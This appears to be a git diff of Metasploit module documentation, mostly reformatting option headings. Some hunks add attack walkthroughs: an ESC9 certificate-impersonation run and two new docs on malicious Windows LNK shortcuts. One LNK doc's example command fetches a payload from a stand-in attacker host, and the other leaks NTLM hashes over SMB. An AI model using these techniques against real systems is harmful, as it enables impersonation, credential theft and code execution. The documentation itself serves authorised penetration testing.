 routing traffic to it through an ELB (Elastic Load Balancer). In either case
-security-groups are used to open access to network ranges and specific TPC/UDP
+security-groups are used to open access to network ranges and specific TCP/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifying a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port.

 ## How it Works

@@ -65,7 +65,7 @@ Web console or the CLI, launching a host in the Cloud requires a fair
 amount of configuration; this module does its best to abstract configuration
 requirements away from the user by auto detecting the VPC, subnets, creating
 security groups, etc. It performs several tasks to launch a host with
-a public IP address, these are as follow: 1) select a VPC, 2) select a subnet, 3)
+a public IP address, these are as follows: 1) select a VPC, 2) select a subnet, 3)
 create/select a security group, 4) create/select a key-pair, and 5) launch
 a host.

@@ -80,7 +80,7 @@ an Internet routable IP address. The module dynamically finds which subnet to
 launch the host in. It will use the first subnet it finds having the
 `Auto-assign Public IP` option set, if no such subnet exists, then it will
 select the first subnet having an Internet gateway. To circumvent this process,
-the `SUBNET_ID` advanced option can be set. 
+the `SUBNET_ID` advanced option can be set.

 When launching a Cloud host at least one security group is required. There are
 several advanced options for creating/selecting a security group. The
@@ -88,7 +88,7 @@ several advanced options for creating/selecting a security group. The
 That is, the module will create a security group unless the `SEC_GROUP_ID`
 options is set. If the `SEC_GROUP_ID` option is not set, the module will attempt
 to create a security group using the values specified in the `SEC_GROUP_CIDR`,
-`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration. 
+`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.

 The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
 create a key-pair (a named SSH public key). Key-pairs are used to authenticate
@@ -113,7 +113,7 @@ use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
 Basic Options:

 * `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
-* `RHOST`: the AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
+* `RHOST`: The AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
 * `Region`: The default region (us-west-2), must match endpoint
 * `AccessKeyId`: AWS API access key
 * `SecretAccessKey`: AWS API secret access key
@@ -129,10 +129,10 @@ Advanced Options:
 * `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
-* `SEC_GROUP_ID`: the EC2 security group to use
-* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to 0.0.0.0/0
-* `SEC_GROUP_NAME`: the EC2 security group name
-* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
+* `SEC_GROUP_ID`: The EC2 security group to use
+* `SEC_GROUP_CIDR`: The EC2 security group network access CIDR, defaults to 0.0.0.0/0
+* `SEC_GROUP_NAME`: The EC2 security group name
+* `SEC_GROUP_PORT`: The EC2 security group network access port, defaults to tcp:22
 * `SUBNET_ID`: The public subnet to use
 * `UserAgent`: The User-Agent header to use for all requests
 * `VPC_ID`: The EC2 VPC ID
@@ -181,7 +181,7 @@ msf auxiliary(aws_launch_instances) > run
 ...
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address 54.186.158.6
-[*] Auxiliary module execution completed 
+[*] Auxiliary module execution completed
 ```

 When the host has passed its primary system checks, the IP address will be
@@ -12,7 +12,7 @@ Only the deprecated DIAL protocol is supported by this module. Casting via the n

 ## Options

-  **VID**
+### VID

  The YouTube video to be played.  Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)

@@ -36,6 +36,9 @@ The certificate template to issue, e.g., "User".
 ### TARGET_USERNAME
 The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.

+### TARGET_PASSWORD
+The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
+
 ### UPDATE_LDAP_OBJECT
 The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.

@@ -135,6 +138,72 @@ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
 [*] Auxiliary module execution completed
 ```

+### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
+```
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
+
+Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
+
+   Name                      Current Setting    Required  Description
+   ----                      ---------------    --------  -----------
+   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
+   ALT_DNS                                      no        Alternative certificate DNS
+   ALT_SID                                      no        Alternative object SID
+   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                        kerberos-DC2-CA    yes       The target certificate authority
+   CERT_TEMPLATE             User               yes       The certificate template
+   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
+   LDAPPassword              N0tpassword!       yes       The password to authenticate with
+   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
+   SSL                       false              no        Enable SSL on the LDAP connection
+   TARGET_PASSWORD           N0tpassword!       no        The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
+   TARGET_USERNAME           user2              yes       The username of the target LDAP object (the victim account).
+   UPDATE_LDAP_OBJECT        userPrincipalName  yes       Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
+   UPDATE_LDAP_OBJECT_VALUE  Administrator      yes       The account name you wish to impersonate
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   445              no        The target port (TCP)
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
+[*] Running module against 172.16.199.200
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Current value of user2's userPrincipalName:
+[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
+[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
+[+] The operation completed successfully!
+[+] 172.16.199.200:445 - The requested certificate was issued.
+[*] 172.16.199.200:445 - Certificate Policies:
+[*] 172.16.199.200:445 - Certificate UPN: Administrator
+[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
+[*] 172.16.199.200:445 - Reverting ldap object
+[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
+[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
+[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
+```
+
 ### ESC9 - Update dnsHostName to `dc2.kerberos.issue`
 ```
 msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
@@ -11,11 +11,11 @@ This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, whi

 ## Options

-  **USERNAME**
+### USERNAME

  The username of the new administrator account. Defaults to a random string.

-  **PASSWORD**
+### PASSWORD

  The password of the new administrator account. Defaults to a random string.

@@ -39,4 +39,4 @@ msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
 [+] Account test_user/test_password created successfully.
 [*] Auxiliary module execution completed
 msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
-```
+```
@@ -23,7 +23,7 @@

 ## Options

-  **rport**
+### rport

  The default is set to `8180`, which is only default on FreeBSD.  All other operating systems, and the software itself, default to `8080`.

@@ -10,11 +10,11 @@ To exploit the vulnerability, the module generates requests and sets a value for

 ## Options

-**PATTERN1** and **PATTERN2**
+### PATTERN1 and PATTERN2

 These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.

-**ID**
+### ID

 The value for query parameter `id` of the page that the news extension is running on.

@@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa

 ## Options

-**PATH**
+### PATH

 This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)

@@ -22,18 +22,18 @@ The required options are based on the action being performed:
 - When changing a password, you must specify the `LDAPUsername` and `LDAPPassword`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
 - The `NEW_PASSWORD` option must always be provided

-**LDAPUsername**
+### LDAPUsername

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**LDAPPassword**
+### LDAPPassword

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

-**TARGET_USER**
+### TARGET_USER

 For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)

-**NEW_PASSWORD**
+### NEW_PASSWORD

-The new password to set.
+The new password to set.
@@ -9,15 +9,15 @@ Windows is the most ideal target because it supports WPAD by default.

 ## Options

-**NBADDR**
+### NBADDR

 The address that the NetBIOS name (NBNAME) should resolve to.

-**NBNAME**
+### NBNAME

 The NetBIOS name to spoof a reply for.

-**PPSRATE**
+### PPSRATE

 The rate at which to send NetBIOS replies.

@@ -25,19 +25,19 @@ List the steps needed to make sure this thing works

 ## Options

-**RHOSTS**
+### RHOSTS

 Set the target host.

-**USERNAME**
+### USERNAME

 Set the USERNAME of the admin account you want to add.

-**PASSWORD**
+### PASSWORD

 Set the PASSWORD of the admin account you want to add.

-**RETRIES**
+### RETRIES

 You can change the maximum number of attempts to add an admin account by using `set RETRIES <max_retries>`.

@@ -19,10 +19,10 @@

 ## Options

-  **SQL**
+### SQL

  The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.

-  **TABLE**
+### TABLE

  Table to create the index on.
@@ -103,11 +103,7 @@

 ## Options

-  **RHOST**
-
-  Target device.
-
-  **FUNCTION**
+### FUNCTION

  Either CREDS (default) or ENUM:
  * CREDS attempts to retrieve administrative password and SNMP community strings
@@ -174,4 +170,4 @@ if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.lengt
  ```
  Note that the above response is an example of the utility of using ENUM.  This function code (0x14) returns a netstat-type response.  Output similar to the above will be displayed for every function code that does not return 'invalid' (0x4).  This may also be useful for devices that do not "unlock" using the function codes supplied in this module; by running through all function codes in sequence, it is likely that an alternate "unlock" function will be sent prior to any function codes that request credentials.

-  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!
+  NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible.  Do NOT use on devices which are mission-critical!
@@ -89,7 +89,7 @@ The CPU mode uses a TCP port depending on the PLC Type, the module will
 automatically detect the type and port to use, but can be overridden with the
 'RPORT' option, however no real reason to configure it. If you accidentally set RPORT, you can unset it with the ```unset RPORT``` command.

-**The ACTION option**
+### ACTION

 Action has four possible values:

@@ -25,22 +25,22 @@ The required options are based on the action being performed:
 - When resetting or changing a password, you must specify `NEW_PASSWORD`
 - When resetting or changing an NTLM hash, you must specify `NEW_NTLM`

-**SMBUser**
+### SMBUser

 The username to use to authenticate to the server. Required for changing a password, even if using an existing session.

-**SMBPass**
+### SMBPass

 The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).

-**TARGET_USER**
+### TARGET_USER

 For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)

-**NEW_PASSWORD**
+### NEW_PASSWORD

 The new password to set for `RESET` and `CHANGE` actions. 

-**NEW_NTLM**
+### NEW_NTLM

-The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -41,23 +41,23 @@ msf exploit(psexec) > exploit

 By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.

-**The NAMEDPIPE Option**
+### The NAMEDPIPE Option

 By default, the module will scan for a list of common pipes for any available one. You can specify one by name.

-**The LEAKATTEMPTS Option**
+### The LEAKATTEMPTS Option

 Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.

-**The DBGTRACE Option**
+### The DBGTRACE Option

 Used to debug, gives extremely verbose information.

-**The SMBUser Option**
+### The SMBUser Option

 This is a valid Windows username.

-**The SMBPass option**
+### The SMBPass option

 This can be either the plain text version or the Windows hash.

@@ -65,7 +65,7 @@ This can be either the plain text version or the Windows hash.

 **Automatic Target**

-There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the native upload. Each target is explained below.

 **Powershell Target**

@@ -38,37 +38,37 @@ accordingly.
 12. Apply the acquired session cookie for the vCenter host at the `/ui` path

 ## Options
-**DOMAIN**
+### DOMAIN

 The vSphere SSO domain; by default this is `vsphere.local`. If this does not match the vSphere SSO
 domain, the module will return `HTTP 400: Issuer not trusted` on execution.

-**USERNAME**
+### USERNAME

 The target user within the SSO domain. This must be a valid user as vCenter will happily issue
 SAML assertions for invalid usernames, but the provided session tokens will not function. There
 should be no reason to modify the target user from the default `administrator` in most scenarios.

-**RHOSTS**
+### RHOSTS

 The vCenter appliance IPv4 address or DNS FQDN. This must be reachable over HTTPS for the module
 to function.

-**VHOST**
+### VHOST

 The fully qualified DNS name of the vCenter appliance; this must be present in the Issuer element
 of the assertion for the module to function. If this value does not match the vCenter appliance
 FQDN, the module will return `HTTP 400` during the initial `GET` request.

-**VC_IDP_CERT**
+### VC_IDP_CERT

 The filesystem path to the vCenter SSO IdP certificate in DER or PEM format.

-**VC_IDP_KEY**
+### VC_IDP_KEY

 The filesystem path to the vCenter SSO IdP private key in DER or PEM format.

-**VC_VMCA_CERT**
+### VC_VMCA_CERT

 The filesystem path to the vCenter VMCA certificate in DER or PEM format.

@@ -30,15 +30,15 @@ value is provided for `VC_IP` the module defaults to assigning the loopback IP `
 7. Do: `dump`

 ## Options
-**VMDIR_MDB**
+### VMDIR_MDB

 Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`

-**VMAFD_DB**
+### VMAFD_DB

 Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`

-**VC_IP**
+### VC_IP

 Optional parameter to set the IPv4 address associated with loot entries made by the module.

@@ -21,16 +21,16 @@ Stop  Stop cooking

 ## Options

-**TEMP**
+### TEMP

 Set this to the desired temperature for cooking. Valid values are `Off`,
 `Warm`, `Low`, and `High`.

-**TIME**
+### TIME

 Set this to the desired cook time in full minutes.

-**DefangedMode**
+### DefangedMode

 Set this to `false` to disable defanged mode and enable module
 functionality. Set this only if you're SURE you want to proceed.
@@ -12,7 +12,7 @@ Tested with Schneider TM221CE16R

 ## Options

-**MODE**
+### MODE

 Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.

@@ -47,12 +47,12 @@ on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali

 ## Options

- **TARGETURI**
+### TARGETURI

 Specifies the base target URI to communicate to the HWBridge API.  By default this is '/' but it
 could be things such as '/api' or the randomly generated URI from the local_hwbridge module

- **DEBUGJSON**
+### DEBUGJSON

 Prints out all the JSON packets that come from the HWBridge API.  Useful for troubleshooting
 a device.
@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.

 ## Options

-**CELLNUMBERS**
+### CELLNUMBERS

 The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
 against multiple phone numbers, ideally you want to create the list in a text file (one number per
@@ -20,12 +20,12 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt

 Remember that these phone numbers must be the same carrier.

-**MMSCARRIER**
+### MMSCARRIER

 The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
 supported carriers.

-**TEXTMESSAGE**
+### TEXTMESSAGE

 The text message you want to send. For example, this will send a text with a link to google:

@@ -35,11 +35,11 @@ set TEXTMESSAGE "Hi, please go: google.com"

 The link should automatically be parsed on the phone and clickable.

-**MMSFILE**
+### MMSFILE

 The attachment to send in the message.

-**MMSFILECTYPE**
+### MMSFILECTYPE

 The content type to use for the attachment. Commonly supported ones include:

@@ -51,28 +51,28 @@ The content type to use for the attachment. Commonly supported ones include:

 To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)

-**SMTPADDRESS**
+### SMTPADDRESS

 The mail server address you wish to use to send the MMS messages.

-**SMTPPORT**
+### SMTPPORT

 The mail server port. By default, this is ```25```.

-**SMTPUSERNAME**
+### SMTPUSERNAME

 The username you use to log into the SMTP server.

-**SMTPPASSWORD**
+### SMTPPASSWORD

 The password you use to log into the SMTP server.

-**SMTPFROM**
+### SMTPFROM

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
 in order to receive the text, such as AT&T.

-**MMSSUBJECT**
+### MMSSUBJECT

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.

 ## Options

-**CELLNUMBERS**
+### CELLNUMBERS

 The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
 multiple phone numbers, ideally you want to create the list in a text file (one number per line),
@@ -20,16 +20,16 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt

 Remember that these phone numbers must be the same carrier.

-**SMSCARRIER**
+### SMSCARRIER

 The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
 supported carriers.

-**SMSSUBJECT**
+### SMSSUBJECT

 The text subject.

-**SMSMESSAGE**
+### SMSMESSAGE

 The text message you want to send. For example, this will send a text with a link to google:

@@ -39,23 +39,23 @@ set SMSMESSAGE "Hi, please go: google.com"

 The link should automatically be parsed on the phone and clickable.

-**SMTPADDRESS**
+### SMTPADDRESS

 The mail server address you wish to use to send the text messages.

-**SMTPPORT**
+### SMTPPORT

 The mail server port. By default, this is ```25```.

-**SMTPUSERNAME**
+### SMTPUSERNAME

 The username you use to log into the SMTP server.

-**SMTPPASSWORD**
+### SMTPPASSWORD

 The password you use to log into the SMTP server.

-**SMTPFROM**
+### SMTPFROM

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

@@ -73,7 +73,6 @@ The module supports the following carriers:
 * Virgin Mobile

 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
-not supported.

 ### Finding the Carrier for a Phone Number

@@ -24,13 +24,13 @@ This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
@@ -23,25 +23,25 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.

-  **REGION**
+### REGION

  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
  
  An example region would be `us-west-2`.

-  **LIMIT**
+### LIMIT

  Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
  
@@ -24,19 +24,19 @@ This module authenticates to AWS S3 (Simple Storage Service), to identify bucket

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF/2dq3SbDsQj4jdyOMOv`.

-  **REGION**
+### REGION

  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
  
@@ -21,7 +21,7 @@

 ## Options

-  **TARGETURI**
+### TARGETURI

  The URI where the multipart form is located.  There is no real default and this will change based on the application.

@@ -93,4 +93,4 @@ msf auxiliary(apache_commons_fileupload_dos) > run
 ```

 ![tomcat7_dos](https://cloud.githubusercontent.com/assets/752491/22169486/71980e2e-df42-11e6-8353-4f1e260375ee.png)
- 
+ 
@@ -8,23 +8,23 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info

 ## Options

-**WS_USERNAME**
+### WS_USERNAME

 This is the basic auth username for the spectrum analysis web service.  This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.

-**WS_PASSWORD**
+### WS_PASSWORD

 This is the basic auth password for the spectrum analysis web service.

-**TIMEOUT**
+### TIMEOUT

 This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery.  Typically, the device crashes within about 5 second of the payload being delivered.  The default value of `15` should be seen as the lower bound for `TIMEOUT` values.

-**RHOSTS**
+### RHOSTS

 Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.

-**RPORT**
+### RPORT

 On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.

@@ -12,16 +12,22 @@

 ## Options

- **DOSTYPE**
+### DOSTYPE

-	GENTLE: *Current sessions will continue to work, but not future ones*
-	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+#### GENTLE

-	SOFT: *No past or future sessions will work*
-      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+*Current sessions will continue to work, but not future ones*
+A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.

-	HARD: *ReDOS or Catastrophic Regex Backtracking*
-	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+#### SOFT
+
+*No past or future sessions will work*
+A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+#### HARD
+
+*ReDOS or Catastrophic Regex Backtracking*
+A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.

 ## Scenarios

@@ -19,15 +19,15 @@ FoxIT after version 9.1 is no longer vulnerable.

 ## Options

-**FILENAME**
+### FILENAME
 This option allows you to customise the generated filename.
 This can be changed using set FILENAME test.pdf

-**LHOST**
+### LHOST
 This option allows you to set the IP address of the SMB Listener that the document points to
 This can be changed using set LHOST 192.168.1.25

-**PDFINJECT**
+### PDFINJECT
 This option allows you to inject the UNC code into an existing PDF document
 This can be changed using set PDFINJECT /path/to/file/pdf.pdf

@@ -89,4 +89,4 @@ msf auxiliary(fileformat/badpdf) > exploit
 [\*] Auxiliary module execution completed
 msf auxiliary(fileformat/badpdf) > 
 
-  ```
+  ```
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed.
+This can lead to arbitrary command execution via manipulated command line buffers.
+
+References:
+- [ZDI-CAN-25373](https://www.zerodayinitiative.com/advisories/ZDI-CAN-25373/)
+- [Windows LNK Research](https://zeifan.my/Windows-LNK/)
+- [Gist Example](https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1)
+- [Trend Micro Analysis](https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html)
+
+Disclosure Date: 2025-07-19.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file will be generated.
+1. Deliver the LNK file to the target Windows system.
+1. Open the LNK file to trigger command execution (e.g., launching calc.exe).
+
+## Options
+
+
+### COMMAND
+
+The command to execute when the LNK is opened.
+
+Default: `C:\\Windows\\System32\\calc.exe`
+
+Example:
+```
+set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"
+```
+
+### DESCRIPTION
+
+Optional description for the LNK file. If not set, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION Important Document
+```
+
+### ICON_PATH
+
+Optional path to an icon for the LNK file. If not set, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### BUFFER_SIZE
+
+The size of the whitespace padding buffer before the command (must be sufficient to avoid truncation).
+
+Default: 900
+
+Example:
+```
+set BUFFER_SIZE 1000
+```
+
+## Scenarios
+
+### Basic Command Execution on Windows
+
+Target: Any Windows system (e.g., Windows 10 or later).
+
+Generate an LNK that launches Calculator with custom padding:
+
+```
+msf > use auxiliary/fileformat/windows_lnk_padding
+msf auxiliary(fileformat/windows_lnk_padding) > set FILENAME calc.lnk
+FILENAME => calc.lnk
+msf auxiliary(fileformat/windows_lnk_padding) > set COMMAND C:\\Windows\\System32\\calc.exe
+COMMAND => C:\\Windows\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > set BUFFER_SIZE 900
+BUFFER_SIZE => 900
+msf auxiliary(fileformat/windows_lnk_padding) > set DESCRIPTION Calculator Shortcut
+DESCRIPTION => Calculator Shortcut
+msf auxiliary(fileformat/windows_lnk_padding) > set ICON_PATH %SystemRoot%\\System32\\calc.exe
+ICON_PATH => %SystemRoot%\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > run
+
+[*] Generating LNK file: calc.lnk
+[+] Successfully created calc.lnk
+[*] Command line buffer size: 900 bytes
+[*] Target command: C:\\Windows\\System32\\calc.exe
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus.
+This can result in NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-06.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or PADDING_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
+1. Deliver the LNK file to the target system.
+1. Right-click the LNK file in Explorer to trigger the SMB connection.
+1. Monitor the listener for captured NTLM hashes.
+
+## Options
+
+### DESCRIPTION
+
+The description for the shortcut.
+
+Default: `Testing Purposes`
+
+Example:
+```
+set DESCRIPTION Important File
+```
+
+### ICON_PATH
+
+The path to an icon for the LNK file.
+
+Default: `e.g. abc.ico`
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+## Scenarios
+
+### NTLM Hash Capture on Right-Click
+
+Target: Windows system with Explorer (e.g., Windows 10 or later).
+
+Generate the LNK file:
+
+```
+msf > use auxiliary/fileformat/right_click_lnk_leak
+msf auxiliary(fileformat/right_click_lnk_leak) > set DESCRIPTION Fake Document
+DESCRIPTION => Fake Document
